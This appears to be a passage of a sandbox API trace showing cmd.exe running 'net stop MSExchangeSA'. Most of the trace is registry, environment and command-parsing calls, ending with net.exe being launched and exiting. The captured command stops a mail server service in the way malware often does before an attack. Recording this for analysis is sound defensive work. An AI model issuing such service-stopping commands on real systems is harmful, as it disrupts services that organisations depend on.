lpBuffer=0x4cbfad4, dwLength=0x1c | out: lpBuffer=0x4cbfad4*(BaseAddress=0x4bc3000, AllocationBase=0x4bc0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.845] VirtualQuery (in: lpAddress=0x4cc0000, lpBuffer=0x4cbfad4, dwLength=0x1c | out: lpBuffer=0x4cbfad4*(BaseAddress=0x4cc0000, AllocationBase=0x4cc0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.845] GetConsoleOutputCP () returned 0x1b5 [0140.845] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.845] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0140.845] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.845] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0140.846] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.846] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0140.846] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.846] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0140.846] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.846] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0140.846] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.846] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0140.846] GetEnvironmentStringsW () returned 0x4ed7d60* [0140.846] FreeEnvironmentStringsA (penv="A") returned 1 [0140.846] GetEnvironmentStringsW () returned 0x4ed7d60* [0140.847] FreeEnvironmentStringsA (penv="A") returned 1 [0140.847] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cbea80 | out: phkResult=0x4cbea80*=0x94) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x0, lpData=0x4cbea8c*=0xc8, lpcbData=0x4cbea88*=0x1000) returned 0x2 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x4, lpData=0x4cbea8c*=0x1, lpcbData=0x4cbea88*=0x4) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x0, lpData=0x4cbea8c*=0x1, lpcbData=0x4cbea88*=0x1000) returned 0x2 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x4, lpData=0x4cbea8c*=0x0, lpcbData=0x4cbea88*=0x4) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x4, lpData=0x4cbea8c*=0x40, lpcbData=0x4cbea88*=0x4) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x4, lpData=0x4cbea8c*=0x40, lpcbData=0x4cbea88*=0x4) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x0, lpData=0x4cbea8c*=0x40, lpcbData=0x4cbea88*=0x1000) returned 0x2 [0140.847] RegCloseKey (hKey=0x94) returned 0x0 [0140.847] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cbea80 | out: phkResult=0x4cbea80*=0x94) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x0, lpData=0x4cbea8c*=0x40, lpcbData=0x4cbea88*=0x1000) returned 0x2 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x4, lpData=0x4cbea8c*=0x1, lpcbData=0x4cbea88*=0x4) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x0, lpData=0x4cbea8c*=0x1, lpcbData=0x4cbea88*=0x1000) returned 0x2 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x4, lpData=0x4cbea8c*=0x0, lpcbData=0x4cbea88*=0x4) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x4, lpData=0x4cbea8c*=0x9, lpcbData=0x4cbea88*=0x4) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x4, lpData=0x4cbea8c*=0x9, lpcbData=0x4cbea88*=0x4) returned 0x0 [0140.847] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4cbea84, lpData=0x4cbea8c, lpcbData=0x4cbea88*=0x1000 | out: lpType=0x4cbea84*=0x0, lpData=0x4cbea8c*=0x9, lpcbData=0x4cbea88*=0x1000) returned 0x2 [0140.847] RegCloseKey (hKey=0x94) returned 0x0 [0140.847] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983d [0140.847] srand (_Seed=0x5ad2983d) [0140.847] GetCommandLineW () returned="/c net stop MSExchangeSA" [0140.847] GetCommandLineW () returned="/c net stop MSExchangeSA" [0140.847] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.848] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4ed9cb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0140.848] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0140.848] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.848] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.848] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.848] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.848] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.848] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.848] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.848] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.848] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.848] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.848] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.848] GetEnvironmentStringsW () returned 0x4ed7d60* [0140.848] FreeEnvironmentStringsA (penv="A") returned 1 [0140.848] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.848] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.848] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.848] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.848] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.848] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.848] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.848] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.848] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.849] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.849] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4cbf858 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.849] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4cbf858, lpFilePart=0x4cbf850 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cbf850*="Desktop") returned 0x1d [0140.849] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0140.849] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4cbf5d8 | out: lpFindFileData=0x4cbf5d8) returned 0x4ed05c8 [0140.849] FindClose (in: hFindFile=0x4ed05c8 | out: hFindFile=0x4ed05c8) returned 1 [0140.849] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4cbf5d8 | out: lpFindFileData=0x4cbf5d8) returned 0x4ed05c8 [0140.849] FindClose (in: hFindFile=0x4ed05c8 | out: hFindFile=0x4ed05c8) returned 1 [0140.849] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0140.849] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4cbf5d8 | out: lpFindFileData=0x4cbf5d8) returned 0x4ed05c8 [0140.849] FindClose (in: hFindFile=0x4ed05c8 | out: hFindFile=0x4ed05c8) returned 1 [0140.849] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0140.849] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0140.849] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0140.849] GetEnvironmentStringsW () returned 0x4ed7d60* [0140.850] FreeEnvironmentStringsA (penv="=") returned 1 [0140.850] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0140.850] GetConsoleOutputCP () returned 0x1b5 [0140.850] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.850] GetUserDefaultLCID () returned 0x409 [0140.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0140.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4cbf988, cchData=128 | out: lpLCData="0") returned 2 [0140.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4cbf988, cchData=128 | out: lpLCData="0") returned 2 [0140.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4cbf988, cchData=128 | out: lpLCData="1") returned 2 [0140.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0140.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0140.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0140.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0140.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0140.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0140.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0140.851] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0140.851] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0140.851] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.851] GetConsoleTitleW (in: lpConsoleTitle=0x4eda9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.852] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0140.852] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0140.852] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0140.852] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0140.852] _wcsicmp (_String1="net", _String2=")") returned 69 [0140.852] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0140.852] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0140.852] _wcsicmp (_String1="IF", _String2="net") returned -5 [0140.852] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0140.852] _wcsicmp (_String1="REM", _String2="net") returned 4 [0140.852] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0140.853] GetConsoleTitleW (in: lpConsoleTitle=0x4cbf670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.854] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0140.854] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0140.854] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0140.854] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0140.854] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="CD") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0140.854] _wcsicmp (_String1="net", _String2="REN") returned -4 [0140.854] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0140.854] _wcsicmp (_String1="net", _String2="SET") returned -5 [0140.854] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0140.854] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0140.854] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0140.854] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0140.854] _wcsicmp (_String1="net", _String2="MD") returned 1 [0140.854] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0140.854] _wcsicmp (_String1="net", _String2="RD") returned -4 [0140.854] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0140.854] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0140.854] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0140.854] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0140.854] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0140.854] _wcsicmp (_String1="net", _String2="VER") returned -8 [0140.854] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0140.854] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0140.854] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0140.854] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0140.854] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0140.854] _wcsicmp (_String1="net", _String2="START") returned -5 [0140.854] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0140.854] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0140.854] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0140.854] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0140.854] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0140.854] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0140.854] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0140.854] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0140.854] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0140.854] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0140.854] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0140.854] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0140.854] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0140.854] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="CD") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0140.854] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0140.854] _wcsicmp (_String1="net", _String2="REN") returned -4 [0140.854] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0140.854] _wcsicmp (_String1="net", _String2="SET") returned -5 [0140.854] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0140.854] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0140.854] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0140.855] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0140.855] _wcsicmp (_String1="net", _String2="MD") returned 1 [0140.855] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0140.855] _wcsicmp (_String1="net", _String2="RD") returned -4 [0140.855] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0140.855] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0140.855] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0140.855] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0140.855] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0140.855] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0140.855] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0140.855] _wcsicmp (_String1="net", _String2="VER") returned -8 [0140.855] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0140.855] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0140.855] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0140.855] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0140.855] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0140.855] _wcsicmp (_String1="net", _String2="START") returned -5 [0140.855] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0140.855] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0140.855] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0140.855] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0140.855] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0140.855] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0140.855] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0140.855] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0140.855] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0140.855] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0140.855] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0140.855] _wcsicmp (_String1="net", _String2="IF") returned 5 [0140.855] _wcsicmp (_String1="net", _String2="REM") returned -4 [0140.855] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0140.855] SetErrorMode (uMode=0x0) returned 0x0 [0140.855] SetErrorMode (uMode=0x1) returned 0x0 [0140.855] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4ed05d0, lpFilePart=0x4cbf17c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cbf17c*="Desktop") returned 0x1d [0140.856] SetErrorMode (uMode=0x0) returned 0x1 [0140.856] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0140.856] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.863] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0140.863] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.863] GetConsoleTitleW (in: lpConsoleTitle=0x4cbf3fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.863] InitializeProcThreadAttributeList (in: lpAttributeList=0x4cbf328, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4cbf30c | out: lpAttributeList=0x4cbf328, lpSize=0x4cbf30c) returned 1 [0140.863] UpdateProcThreadAttribute (in: lpAttributeList=0x4cbf328, dwFlags=0x0, Attribute=0x60001, lpValue=0x4cbf314, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4cbf328, lpPreviousValue=0x0) returned 1 [0140.863] GetStartupInfoW (in: lpStartupInfo=0x4cbf360 | out: lpStartupInfo=0x4cbf360*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.864] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.864] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0140.865] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeSA", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4cbf2b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeSA", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4cbf2fc | out: lpCommandLine="net stop MSExchangeSA", lpProcessInformation=0x4cbf2fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x454, dwThreadId=0x834)) returned 1 [0140.872] CloseHandle (hObject=0xa4) returned 1 [0140.872] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0140.872] GetEnvironmentStringsW () returned 0x4ed9ec8* [0140.872] FreeEnvironmentStringsA (penv="=") returned 1 [0140.872] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0140.993] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4cbf294 | out: lpExitCode=0x4cbf294*=0x2) returned 1 [0140.993] CloseHandle (hObject=0xa8) returned 1 [0140.993] _vsnwprintf (in: _Buffer=0x4cbf37c, 